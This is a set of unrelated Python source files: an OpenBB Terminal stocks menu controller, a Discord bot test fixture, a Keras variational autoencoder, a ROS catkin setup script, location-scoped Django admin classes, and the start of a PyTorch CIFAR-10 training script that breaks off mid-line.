c: None for c in stocks_helper.market_coverage_suffix
}
choices["search"]["-e"] = {
c: None for c in stocks_helper.market_coverage_suffix
}
choices["support"] = self.SUPPORT_CHOICES
self.completer = NestedCompleter.from_nested_dict(choices)
def print_help(self):
"""Print help"""
stock_text = ""
if self.ticker:
s_intraday = (f"Intraday {self.interval}", "Daily")[
self.interval == "1440min"
]
if self.start:
stock_text = f"{s_intraday} {self.ticker} (from {self.start.strftime('%Y-%m-%d')})"
else:
stock_text = f"{s_intraday} {self.ticker}"
mt = MenuText("stocks/", 80)
mt.add_cmd("search")
mt.add_cmd("load")
mt.add_raw("\n")
mt.add_param("_ticker", stock_text)
mt.add_raw(self.add_info)
mt.add_raw("\n")
mt.add_cmd("quote", "", self.ticker)
mt.add_cmd("candle", "", self.ticker)
mt.add_cmd("news", "News API", self.ticker)
mt.add_cmd("codes", "Polygon", self.ticker)
mt.add_raw("\n")
mt.add_menu("th")
mt.add_menu("options")
mt.add_menu("disc")
mt.add_menu("sia")
mt.add_menu("dps")
mt.add_menu("scr")
mt.add_menu("ins")
mt.add_menu("gov")
mt.add_menu("ba")
mt.add_menu("ca")
mt.add_menu("fa", self.ticker)
mt.add_menu("res", self.ticker)
mt.add_menu("dd", self.ticker)
mt.add_menu("bt", self.ticker)
mt.add_menu("ta", self.ticker)
mt.add_menu("qa", self.ticker)
mt.add_menu("pred", self.ticker)
console.print(text=mt.menu_text, menu="Stocks")
def custom_reset(self):
"""Class specific component of reset command"""
if self.ticker:
return [
"stocks",
f"load {self.ticker}.{self.suffix}"
if self.suffix
else f"load {self.ticker}",
]
return []
@log_start_end(log=logger)
def call_search(self, other_args: List[str]):
"""Process search command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="search",
description=translate("stocks/SEARCH"),
)
parser.add_argument(
"-q",
"--query",
action="store",
dest="query",
type=str.lower,
default="",
help=translate("stocks/SEARCH_query"),
)
parser.add_argument(
"-c",
"--country",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.country),
dest="country",
help=translate("stocks/SEARCH_country"),
)
parser.add_argument(
"-s",
"--sector",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.sector),
dest="sector",
help=translate("stocks/SEARCH_sector"),
)
parser.add_argument(
"-i",
"--industry",
default="",
nargs=argparse.ONE_OR_MORE,
action=choice_check_after_action(AllowArgsWithWhiteSpace, self.industry),
dest="industry",
help=translate("stocks/SEARCH_industry"),
)
parser.add_argument(
"-e",
"--exchange",
default="",
choices=list(stocks_helper.market_coverage_suffix.keys()),
dest="exchange_country",
help=translate("stocks/SEARCH_exchange"),
)
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-q")
ns_parser = self.parse_known_args_and_warn(
parser,
other_args,
EXPORT_ONLY_RAW_DATA_ALLOWED,
limit=10,
)
if ns_parser:
stocks_helper.search(
query=ns_parser.query,
country=ns_parser.country,
sector=ns_parser.sector,
industry=ns_parser.industry,
exchange_country=ns_parser.exchange_country,
limit=ns_parser.limit,
export=ns_parser.export,
)
@log_start_end(log=logger)
def call_quote(self, other_args: List[str]):
"""Process quote command"""
ticker = self.ticker + "." + self.suffix if self.suffix else self.ticker
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="quote",
description=translate("stocks/QUOTE"),
)
if self.ticker:
parser.add_argument(
"-t",
"--ticker",
action="store",
dest="s_ticker",
default=ticker,
help=translate("stocks/QUOTE_ticker"),
)
else:
parser.add_argument(
"-t",
"--ticker",
action="store",
dest="s_ticker",
required="-h" not in other_args,
help=translate("stocks/QUOTE_ticker"),
)
# For the case where a user uses: 'quote BB'
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-t")
ns_parser = self.parse_known_args_and_warn(parser, other_args)
if ns_parser:
stocks_helper.quote(ns_parser.s_ticker)
@log_start_end(log=logger)
def call_codes(self, _):
"""Process codes command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="codes",
description="Show CIK, FIGI and SCI code from polygon for loaded ticker.",
)
ns_parser = self.parse_known_args_and_warn(parser, _)
if ns_parser:
if not self.ticker:
console.print("No ticker loaded. First use `load {ticker}`\n")
return
stocks_helper.show_codes_polygon(self.ticker)
@log_start_end(log=logger)
def call_candle(self, other_args: List[str]):
"""Process candle command"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="candle",
description=translate("stocks/CANDLE"),
)
parser.add_argument(
"-p",
"--plotly",
dest="plotly",
action="store_false",
default=True,
help=translate("stocks/CANDLE_plotly"),
)
parser.add_argument(
"--sort",
choices=[
"AdjClose",
"Open",
"Close",
"High",
"Low",
"Volume",
"Returns",
"LogRet",
],
default="",
type=str,
dest="sort",
help=translate("stocks/CANDLE_sort"),
)
parser.add_argument(
"-d",
"--descending",
action="store_false",
dest="descending",
default=True,
help=translate("stocks/CANDLE_descending"),
)
parser.add_argument(
"--raw",
action="store_true",
dest="raw",
default=False,
help=translate("stocks/CANDLE_raw"),
)
parser.add_argument(
"-t",
"--trend",
action="store_true",
default=False,
help=translate("stocks/CANDLE_trend"),
dest="trendlines",
)
parser.add_argument(
"--ma",
dest="mov_avg",
type=str,
help=translate("stocks/CANDLE_mov_avg"),
default=None,
)
ns_parser = self.parse_known_args_and_warn(
parser,
other_args,
EXPORT_ONLY_RAW_DATA_ALLOWED,
limit=20,
)
if ns_parser:
if self.ticker:
export_data(
ns_parser.export,
os.path.join(
os.path.dirname(os.path.abspath(__file__)), "raw_data"
),
f"{self.ticker}",
self.stock,
)
if ns_parser.raw:
qa_view.display_raw(
df=self.stock,
sort=ns_parser.sort,
des=ns_parser.descending,
num=ns_parser.limit,
)
else:
data = stocks_helper.process_candle(self.stock)
mov_avgs = []
if ns_parser.mov_avg:
mov_list = (num for num in ns_parser.mov_avg.split(","))
for num in mov_list:
try:
mov_avgs.append(int(num))
except ValueError:
console.print(
f"{num} is not a valid moving average, must be integer"
)
stocks_helper.display_candle(
s_ticker=self.ticker,
df_stock=data,
use_matplotlib=ns_parser.plotly,
intraday=self.interval != "1440min",
add_trend=ns_parser.trendlines,
ma=mov_avgs,
)
else:
console.print("No ticker loaded. First use `load {ticker}`\n")
@log_start_end(log=logger)
def call_news(self, other_args: List[str]):
"""Process news command"""
if not self.ticker:
console.print("Use 'load <ticker>' prior to this command!", "\n")
return
parser = argparse.ArgumentParser(
add_help=False,
prog="news",
description=translate("stocks/NEWS"),
)
parser.add_argument(
"-d",
"--date",
action="store",
dest="n_start_date",
type=valid_date,
default=datetime.now() - timedelta(days=7),
help=translate("stocks/NEWS_date"),
)
parser.add_argument(
"-o",
"--oldest",
action="store_false",
dest="n_oldest",
default=True,
help=translate("stocks/NEWS_oldest"),
)
parser.add_argument(
"-s",
"--sources",
dest="sources",
default=[],
nargs="+",
help=translate("stocks/NEWS_sources"),
)
if other_args and "-" not in other_args[0][0]:
other_args.insert(0, "-l")
ns_parser = self.parse_known_args_and_warn(parser, other_args, limit=5)
if ns_parser:
sources = ns_parser.sources
for idx, source in enumerate(sources):
if source.find(".") == -1:
sources[idx] += ".com"
d_stock = yf.Ticker(self.ticker).info
newsapi_view.display_news(
term=d_stock["shortName"].replace(" ", "+")
if "shortName" in d_stock
else self.ticker,
num=ns_parser.limit,
s_from=ns_parser.n_start_date.strftime("%Y-%m-%d"),
show_newest=ns_parser.n_oldest,
sources=",".join(sources),
)
@log_start_end(log=logger)
def call_disc(self, _):
"""Process disc command"""
from openbb_terminal.stocks.discovery.disc_controller import (
DiscoveryController,
)
self.queue = self.load_class(DiscoveryController, self.queue)
@log_start_end(log=logger)
def call_dps(self, _):
"""Process dps command"""
from openbb_terminal.stocks.dark_pool_shorts.dps_controller import (
DarkPoolShortsController,
)
self.queue = self.load_class(
DarkPoolShortsController, self.ticker, self.start, self.stock, self.queue
)
@log_start_end(log=logger)
def call_scr(self, _):
"""Process scr command"""
from openbb_terminal.stocks.screener.screener_controller import (
ScreenerController,
)
self.queue = self.load_class(ScreenerController, self.queue)
@log_start_end(log=logger)
def call_sia(self, _):
"""Process ins command"""
from openbb_terminal.stocks.sector_industry_analysis.sia_controller import (
SectorIndustryAnalysisController,
)
self.queue = self.load_class(
SectorIndustryAnalysisController, self.ticker, self.queue
)
@log_start_end(log=logger)
def call_ins(self, _):
"""Process ins command"""
from openbb_terminal.stocks.insider.insider_controller import (
InsiderController,
)
self.queue = self.load_class(
InsiderController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
@log_start_end(log=logger)
def call_gov(self, _):
"""Process gov command"""
from openbb_terminal.stocks.government.gov_controller import GovController
self.queue = self.load_class(GovController, self.ticker, self.queue)
@log_start_end(log=logger)
def call_options(self, _):
"""Process options command"""
from openbb_terminal.stocks.options.options_controller import (
OptionsController,
)
self.queue = self.load_class(OptionsController, self.ticker, self.queue)
@log_start_end(log=logger)
def call_th(self, _):
"""Process th command"""
from openbb_terminal.stocks.tradinghours.tradinghours_controller import (
TradingHoursController,
)
self.queue = self.load_class(TradingHoursController, self.queue)
@log_start_end(log=logger)
def call_res(self, _):
"""Process res command"""
if self.ticker:
from openbb_terminal.stocks.research.res_controller import (
ResearchController,
)
self.queue = self.load_class(
ResearchController, self.ticker, self.start, self.interval, self.queue
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_dd(self, _):
"""Process dd command"""
if self.ticker:
from openbb_terminal.stocks.due_diligence import dd_controller
self.queue = self.load_class(
dd_controller.DueDiligenceController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ca(self, _):
"""Process ca command"""
from openbb_terminal.stocks.comparison_analysis import ca_controller
self.queue = self.load_class(
ca_controller.ComparisonAnalysisController,
[self.ticker] if self.ticker else "",
self.queue,
)
@log_start_end(log=logger)
def call_fa(self, _):
"""Process fa command"""
if self.ticker:
from openbb_terminal.stocks.fundamental_analysis import fa_controller
self.queue = self.load_class(
fa_controller.FundamentalAnalysisController,
self.ticker,
self.start,
self.interval,
self.suffix,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_bt(self, _):
"""Process bt command"""
if self.ticker:
from openbb_terminal.stocks.backtesting import bt_controller
self.queue = self.load_class(
bt_controller.BacktestingController, self.ticker, self.stock, self.queue
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ta(self, _):
"""Process ta command"""
if self.ticker:
from openbb_terminal.stocks.technical_analysis import ta_controller
self.queue = self.load_class(
ta_controller.TechnicalAnalysisController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_ba(self, _):
"""Process ba command"""
from openbb_terminal.stocks.behavioural_analysis import ba_controller
self.queue = self.load_class(
ba_controller.BehaviouralAnalysisController,
self.ticker,
self.start,
self.queue,
)
@log_start_end(log=logger)
def call_qa(self, _):
"""Process qa command"""
if self.ticker:
from openbb_terminal.stocks.quantitative_analysis import (
qa_controller,
)
self.queue = self.load_class(
qa_controller.QaController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
# TODO: This menu should work regardless of data being daily or not!
# James: 5/27 I think it does now
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
@log_start_end(log=logger)
def call_pred(self, _):
"""Process pred command"""
if obbff.ENABLE_PREDICT:
if self.ticker:
if self.interval == "1440min":
try:
from openbb_terminal.stocks.prediction_techniques import (
pred_controller,
)
self.queue = self.load_class(
pred_controller.PredictionTechniquesController,
self.ticker,
self.start,
self.interval,
self.stock,
self.queue,
)
except ModuleNotFoundError as e:
logger.exception(
"One of the optional packages seems to be missing: %s",
str(e),
)
console.print(
"One of the optional packages seems to be missing: ",
e,
"\n",
)
# TODO: This menu should work regardless of data being daily or not!
else:
console.print("Load daily data to use this menu!", "\n")
else:
console.print("Use 'load <ticker>' prior to this command!", "\n")
else:
console.print(
"Predict is disabled. Check ENABLE_PREDICT flag on feature_flags.py",
"\n",
)
|
import sys
from pathlib import Path
import discord.ext.test as dpytest
import pytest
from discord.ext import commands
from dotenv import load_dotenv
def get_extensions():
extensions = []
extensions.append("jishaku")
if sys.platform == "win32" or sys.platform == "cygwin":
dirpath = "\\"
else:
dirpath = "/"
for file in Path("utils").glob("**/*.py"):
if "!" in file.name or "DEV" in file.name:
continue
extensions.append(str(file).replace(dirpath, ".").replace(".py", ""))
return extensions
load_dotenv()
@pytest.fixture
def bot(event_loop):
bot = commands.Bot(loop=event_loop)
bot.remove_command("help")
dpytest.configure(bot)
return bot
@pytest.mark.asyncio
async def test_cogs(bot):
for ext in get_extensions():
bot.load_extension(ext)
def pytest_sessionfinish():
print("Session finished")
|
import os
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
import tensorflow as tf
os.environ['KERAS_BACKEND'] = 'tensorflow'
import keras
from packaging import version
assert version.parse(keras.__version__) >= version.parse("2.2.0"), \
"Keras version too old for the autoencoder, need at least 2.2.x"
from keras import backend as K
logger.info(f"Backend: {K.backend()}")
assert K.backend() == "tensorflow", f"Keras should use the tensorflow backend, not {K.backend()}"
from keras.layers import Lambda, Input, Dense
from keras.models import Model
from keras.losses import mse, binary_crossentropy
# plot_model requires that pydot is installed
#from keras.utils import plot_model
#from toolbox import toolbox
from network import VariationalAutoencoder
from network.keras_tensorflow import Network as KerasNetwork
class KerasAutoencoder(VariationalAutoencoder, KerasNetwork):
"""A (variational) autoencoder implemented in Keras.
Attributes
----------
_vae
_encoder
_decoder
_inputs
_outputs
_epochs
_batch_size
_weights_file
_mse
"""
def __init__(self, original_dim, *args, intermediate_dim: int=512,
latent_dim: int=2, loss: str='mse', **kwargs):
"""Construct a new, fully connected (dense) autoencoder.
Both, encoder and decoder, will have one itermediate layer
of the given dimension.
"""
logger.info(f"New VAE: {original_dim}/{intermediate_dim}/{latent_dim}")
super().__init__(*args, **kwargs)
self._original_dim = original_dim
self._intermediate_dim = intermediate_dim
self._latent_dim = latent_dim
self._loss = loss
def _compute_layer_ids(self):
return [] # FIXME[concept]: what layer ids do we want to provide here?
def _prepare(self):
super()._prepare()
# network parameters
input_shape = (self._original_dim, )
# VAE model = encoder + decoder
with self._graph.as_default():
#
# (1) build encoder model
#
self._inputs = Input(shape=input_shape, name='encoder_input')
print("intput_shape:", input_shape,
"intermediate_dim:", self._intermediate_dim)
print("intputs:", self._inputs)
x = Dense(self._intermediate_dim, activation='relu')(self._inputs)
self._z_mean = Dense(self._latent_dim, name='z_mean')(x)
self._z_log_var = Dense(self._latent_dim, name='z_log_var')(x)
# Use reparameterization trick to push the sampling out as
# input (note that "output_shape" isn't necessary with the
# TensorFlow backend)
self._z = Lambda(self._sampling, output_shape=(self._latent_dim,),
name='z')([self._z_mean, self._z_log_var])
# instantiate encoder model. It provides two outputs:
# - (z_mean, z_log_var): a pair describing the mean and (log)
# variance of the code variable z (for input x)
# - z: a value sampled from that distribution
self._encoder = Model(self._inputs,
[self._z_mean, self._z_log_var, self._z],
name='encoder')
self._encoder.summary(print_fn=self._print_fn)
# plot_model requires pydot
#plot_model(self._encoder, to_file='vae_mlp_encoder.png',
# show_shapes=True)
#
# (2) build decoder model
#
latent_inputs = Input(shape=(self._latent_dim,), name='z_sampling')
x = Dense(self._intermediate_dim, activation='relu')(latent_inputs)
self._outputs = Dense(self._original_dim, activation='sigmoid')(x)
# instantiate decoder model
self._decoder = Model(latent_inputs, self._outputs, name='decoder')
self._decoder.summary(print_fn=self._print_fn)
# plot_model require pydot installed
#plot_model(self._decoder, to_file='vae_mlp_decoder.png', show_shapes=True)
#
# (3) define the loss function
#
self._outputs = self._decoder(self._encoder(self._inputs)[2])
if self._loss == 'mse':
reconstruction_loss = mse(self._inputs, self._outputs)
else:
reconstruction_loss = binary_crossentropy(self._inputs,
self._outputs)
# VAE loss = mse_loss or xent_loss + kl_loss
reconstruction_loss *= self._original_dim
kl_loss = (1 + self._z_log_var -
K.square(self._z_mean) - K.exp(self._z_log_var))
kl_loss = K.sum(kl_loss, axis=-1)
kl_loss *= -0.5
vae_loss = K.mean(reconstruction_loss + kl_loss)
#
# (4) instantiate VAE model
#
self._vae = Model(self._inputs, self._outputs, name='vae_mlp')
self._vae.add_loss(vae_loss)
self._vae.compile(optimizer='adam')
self._vae.summary(print_fn=self._print_fn)
self._model = self._vae
def _unprepare(self) -> None:
self._model = None
self._vae = None
self._inputs = None
self._z_mean = None
self._z_log_var = None
self._z = None
self._encoder = None
self._outputs = None
self._decoder = None
super()._unprepare()
def _print_fn(self, line):
logger.info(line)
# use the reparameterization trick:
# instead of sampling from Q(z|X), sample eps = N(0,I)
# z = z_mean + sqrt(var)*eps
def _sampling(self, args):
"""Reparameterization trick by sampling fr an isotropic unit
Gaussian.
Arguments
---------
args (tensor): mean and log of variance of Q(z|X)
Returns
-------
z (tensor): sampled latent vector
"""
z_mean, z_log_var = args
batch = K.shape(z_mean)[0]
dim = K.int_shape(z_mean)[1]
# by default, random_normal has mean=0 and std=1.0
epsilon = K.random_normal(shape=(batch, dim))
return z_mean + K.exp(0.5 * z_log_var) * epsilon
def train(self, data, validation, epochs, batch_size, progress):
#toolbox.acquire()
with self._graph.as_default():
with self._session.as_default():
self._vae.fit(data,
epochs=epochs,
verbose=0,
batch_size=batch_size,
validation_data=(validation, None),
callbacks=[progress])
#toolbox.release()
def encode(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
z_mean, _, _ = \
self._encoder.predict(data, batch_size=batch_size)
return z_mean
def decode(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
x_decoded = \
self._decoder.predict(data, batch_size=batch_size)
return x_decoded
def reconstruct(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
reconstruction = self._vae.predict(data, batch_size=batch_size)
return reconstruction
def sample_code(self, input=None, params=None, n=1, batch_size=None):
"""Sample code values, either for given input values,
or for given parameters.
"""
with self._graph.as_default():
with self._session.as_default():
feed_dict = {}
if params is not None:
z_mean = params['z_mean']
if not instanceof(z_mean, np.ndarray):
z_mean = np.full(n, z_mean)
feed_dict[self._z_mean] = z_mean
z_log_var = params['z_log_var']
if not instanceof(z_log_var, np.ndarray):
z_log_var = np.full(n, z_log_var)
feed_dict[self._z_mean] = z_log_var
z = self._z.eval(feed_dict=feed_dict)
elif input is not None:
_, _, z= \
self._encoder.predict(input, batch_size=batch_size)
return z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/chenz16/Desktop/Rover/install_isolated;/opt/ros/kinetic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/chenz16/Desktop/Rover/devel_isolated/mrobot_navigation/env.sh')
output_filename = '/home/chenz16/Desktop/Rover/build_isolated/mrobot_navigation/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
from django.contrib import admin
from django.contrib.auth.admin import GroupAdmin as BaseGroupAdmin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin
from regions.models import StgLocation
from django.contrib.admin.models import LogEntry
from .models import CustomUser, CustomGroup,AhodctUserLogs
from . import models
from django.forms import TextInput,Textarea # customize textarea row and column
from django_admin_listfilter_dropdown.filters import (
DropdownFilter, RelatedDropdownFilter, ChoiceDropdownFilter,
RelatedOnlyDropdownFilter) #custom
@admin.register(models.CustomUser)
class UserAdmin (UserAdmin):
from django.db import models
formfield_overrides = {
models.CharField: {'widget': TextInput(attrs={'size':'100'})},
models.TextField: {'widget': Textarea(attrs={'rows':3, 'cols':100})},
}
"""
We don't need to show list of permissions for non superuser admins. They
just need to assign the groups which already are linked to the permissions
"""
def get_fieldsets(self, request, obj=None):
fieldsets = super(UserAdmin, self).get_fieldsets(request, obj)
# This method hides permsions and super use attributes on the model form
remove_fields = ['user_permissions','is_superuser']
if not request.user.is_superuser:
if len(fieldsets) > 0:
for f in fieldsets:
if f[0] == 'Account Permissions':
fieldsets[2][1]['fields'] = tuple(
x for x in fieldsets[2][1]['fields']
if not x in remove_fields)
break
return fieldsets
"""
For non superusers, eg. Country admins, if they need to assign groups to
other users, we only need to show groups in the Country admins location
"""
def get_form(self, request, obj=None, **kwargs):
form = super(UserAdmin, self).get_form(request, obj, **kwargs)
if not request.user.is_superuser:
filtered_groups = CustomGroup.objects.filter(
location=request.user.location)
if form.base_fields.get('groups'):
form.base_fields['groups'].queryset=CustomGroup.objects.filter(
location=request.user.location)
return form
"""
The purpose of this method is to delegate limited role of creatting users
and groups to a non-superuser. This is achieved by assigning logged in user
location to the user being created.
"""
def save_model(self, request, obj, form, change):
req_user = request.user
if not req_user.is_superuser:
obj.location = req_user.location
super().save_model(request, obj, form, change)
"""
The purpose of this method is to filter displayed list of users to location
of logged in user
"""
def get_queryset(self, request):
qs = super().get_queryset(request)
# Get a query of groups the user belongs and flatten it to list object
groups = list(request.user.groups.values_list('user', flat=True))
user = request.user.id
user_location = request.user.location
if request.user.is_superuser:
qs # return all instances of the request instances
elif user in groups: # Fetch all instances of group membership
qs=qs.filter(location=user_location)
else:
qs=qs.filter(username=user)
return qs
def formfield_for_foreignkey(self, db_field, request =None, **kwargs):
groups = list(request.user.groups.values_list('user', flat=True))
user = request.user.id
user_location = request.user.location.location_id
db_locations = StgLocation.objects.all().order_by('location_id')
language = request.LANGUAGE_CODE
if db_field.name == "location":
if request.user.is_superuser:
kwargs["queryset"] = StgLocation.objects.all().order_by(
'location_id')
# Looks up for the location level upto the country level
elif user in groups and user_location==1:
kwargs["queryset"] = StgLocation.objects.filter(
locationlevel__locationlevel_id__gte=1,
locationlevel__locationlevel_id__lte=2).order_by(
'location_id')
else:
kwargs["queryset"] = StgLocation.objects.filter(
location_id=request.user.location_id).filter(
translations__language_code=language).distinct()
return super().formfield_for_foreignkey(db_field, request,**kwargs)
readonly_fields = ('last_login','date_joined',)
fieldsets = (
('Personal info', {'fields': ('title','first_name', 'last_name',
'gender','location')}),
('Login Credentials', {'fields': ('email', 'username',)}),
('Account Permissions', {'fields': ('is_active', 'is_staff',
'is_superuser', 'groups', 'user_permissions')}),
('Login Details', {'fields': ('last_login',)}),
)
limited_fieldsets = (
('Persional Details', {'fields': ('email',)}),
('Personal info', {'fields': ('first_name', 'last_name','location')}),
('Important dates', {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
('Contacts and Password', {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')}
),
)
list_select_related = ('location',)
list_display = ['first_name','last_name','username','email','gender',
'location','last_login']
list_display_links = ['first_name','last_name','username','email']
admin.site.unregister(Group)# Unregister the group in order to use custom group
@admin.register(models.CustomGroup)
class GroupAdmin(BaseGroupAdmin):
def get_queryset(self, request):
qs = super().get_queryset(request)
# Get a query of groups the user belongs and flatten it to list object
groups = list(request.user.groups.values_list('user', flat=True))
user = request.user.id
user_location = request.user.location
if request.user.is_superuser:
qs # return all instances of the request instances
elif user in groups: # Fetch all instances of group membership
qs=qs.filter(location=user_location)
else:
qs=qs.filter(username=user)
return qs
"""
The purpose of this method is to restrict display of permission selections
in the listbox. Only permissions asigned to logged in user group are loaded.
"""
def get_form(self, request, obj=None, **kwargs):
form = super(GroupAdmin, self).get_form(request, obj, **kwargs)
if not request.user.is_superuser:
filtered_groups = CustomGroup.objects.filter(
location=request.user.location)
user_permissions = [f.permissions.all() for f in filtered_groups][0]
if form.base_fields.get('permissions'):
form.base_fields['permissions'].queryset = user_permissions
return form
def formfield_for_foreignkey(self, db_field, request =None, **kwargs):
language = request.LANGUAGE_CODE # get anguage code e.g. fr from request
if not request.user.is_superuser:
user_location = request.user.location
if db_field.name == "location":
kwargs["queryset"] = StgLocation.objects.filter(
location_id=user_location.location_id).filter(
translations__language_code=language).distinct()
return super().formfield_for_foreignkey(db_field, request,**kwargs)
list_display = ['name','location','roles_manager']
list_select_related = ('role','location',)
# This query unmanaged class allows the super admin to track user activities!
@admin.register(AhodctUserLogs)
class AhoDCT_LogsAdmin(admin.ModelAdmin):
# This function removes the add button on the admin interface
def has_delete_permission(self, request, obj=None):
return False
# This function removes the add button on the admin interface
def has_add_permission(self, request, obj=None):
return False
#This method removes the save buttons from the model form
def changeform_view(self,request,object_id=None,form_url='',
extra_context=None):
extra_context = extra_context or {}
extra_context['show_save_and_continue'] = False
extra_context['show_save'] = False
return super(AhoDCT_LogsAdmin, self).changeform_view(
request, object_id, extra_context=extra_context)
list_display=['username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action','action_time',
'last_login',]
readonly_fields = ('username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action','action_time',
'last_login',)
search_fields = ('username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action',)
list_filter = (
('record_name', DropdownFilter,),
('app_label', DropdownFilter,),
('location_translation', DropdownFilter,),
('action', DropdownFilter),
)
ordering = ('-action_time',)
|
"""Fred: Train CIFAR10 with PyTorch.
Epoch: 0
[================================================================>] Step: 1s633ms | Tot: 1m49s | Loss: 1.797 | Acc: 33.956% (16978/50000) 391/391
[================================================================>] Step: 71ms | Tot: 9s672ms | Loss: 1.445 | Acc: 45.800% (4580/10000) 100/100
Saving..
Epoch: 1
[================================================================>] Step: 172ms | Tot: 1m42s | Loss: 1.341 | Acc: 51.022% (25511/50000) 391/391
[================================================================>] Step: 76ms | Tot: 7s520ms | Loss: 1.193 | Acc: 57.370% (5737/10000) 100/100
Saving..
Epoch: 228
[================================================================>] Step: 185ms | Tot: 1m36s | Loss: 0.002 | Acc: 99.992% (49996/50000) 391/391
[================================================================>] Step: 75ms | Tot: 7s198ms | Loss: 0.187 | Acc: 95.160% (9516/10000) 100/100
"""
""" Trial 2
Epoch: 221
[================================================================>] Step: 67ms | Tot: 54s743ms | Loss: 0.002 | Acc: 100.000% (50000/50000) 391/391
root-INFO: Number of zero_grads (2867200/5243680)
[================================================================>] Step: 26ms | Tot: 2s648ms | Loss: 0.176 | Acc: 95.300% (9530/10000) 100/100
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import numpy as np
import torchvision
import torchvision.transforms as transforms
import time
import os
import argparse
import logging
import sys
from models import *
from utils import progress_bar
from tqdm import tqdm
# from torchsummary import summary
# from ptflops import get_model_complexity_info
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true',
help='resume from checkpoint')
parser.add_argument('--zero_grad_mea', default=True, type=bool, help='monitor the zero grad')
parser.add_argument('--epochs', default=300, type=int, help='assigned running epochs')
# parser.add_argument('--zero_grad_mea', default=False, type=bool, help='if the num_zero_error_grad fn will be activated')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 1 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(
root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=128, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(
root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(
testset, batch_size=100, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
# net = VGG('VGG19')
# net = PreActResNet18()
# net = GoogLeNet()
# net = DenseNet121()
# net = ResNeXt29_2x64d()
# net = MobileNet()
# net = MobileNetV2()
# net = DPN92()
# net = ShuffleNetG2()
# net = SENet18()
# net = ShuffleNetV2(1)
# net = EfficientNetB0()
# net = RegNetX_200MF()
# net = SimpleDLA()
net = ResNet18(zero_grad_mea=args.zero_grad_mea)
# net = AlexNet(zero_grad_mea=args.zero_grad_mea)
net = net.to(device)
# net_name = 'alexnet'
net_name = 'resnet'
if device == 'cuda':
# net = torch.nn.DataParallel(net)
net.cuda()
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/ckpt.pth')
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr,
